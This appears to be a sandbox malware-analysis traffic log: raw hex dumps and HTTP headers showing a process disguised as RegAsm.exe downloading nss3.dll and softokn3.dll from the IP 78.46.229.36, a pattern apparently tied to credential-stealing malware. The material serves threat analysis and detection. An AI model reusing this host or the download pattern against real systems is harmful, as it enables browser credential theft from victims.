                                                                                                                                                                                                                                                  2024-03-29 11:08:10 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                                                                                                                                                                                  Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                                                                                                                                                                                                  2024-03-29 11:08:10 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                                                                                                                                                                                  Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                                                                                                                                                                                  2024-03-29 11:08:10 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                                                                                                                                                                                  Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                                                                                                                                                                                                  2024-03-29 11:08:10 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                                                                                                                                                                                  Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                                                                                                                                                                                                  2024-03-29 11:08:10 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                                                                                                                                                                                  Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                                                                                                                                                                                                  2024-03-29 11:08:10 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                                                                                                                                                                                  Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                                                                                                                                                                                  2024-03-29 11:08:10 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                                                                                                                                                                                  Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                                                                                                                                                                                  2024-03-29 11:08:10 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                                                                                                                                                                                  Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                                                                                                                                                                                  2024-03-29 11:08:11 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                                                                                                                                                                                  Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  14192.168.2.44975778.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:11 UTC202OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:12 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:12 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 2046288
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  ETag: "6315a9f4-1f3950"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-03-29 11:08:12 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                                                  2024-03-29 11:08:12 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                                                                                                                                                                                                  Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                                                                                                                                                                                                  2024-03-29 11:08:12 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                                                                                                                                                                                                  Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                                                                  2024-03-29 11:08:12 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                                                                                                                                                                                                  Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                                                                                                                                                                                                  2024-03-29 11:08:12 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                                                                                                                                                                                  Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                                                                                                                                                                                  2024-03-29 11:08:12 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                                                                                                                                                                                                  Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                                                                                                                                                                                  2024-03-29 11:08:12 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                                                                                                                                                                                                  Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                                                                                                                                                                                  2024-03-29 11:08:12 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                                                                                                                                                                                  Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                                                                                                                                                                                  2024-03-29 11:08:12 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                                                                                                                                                                                  Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                                                                                                                                                                                                  2024-03-29 11:08:12 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                                                                                                                                                                                  Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  15192.168.2.44975878.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:14 UTC206OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:14 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:14 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 257872
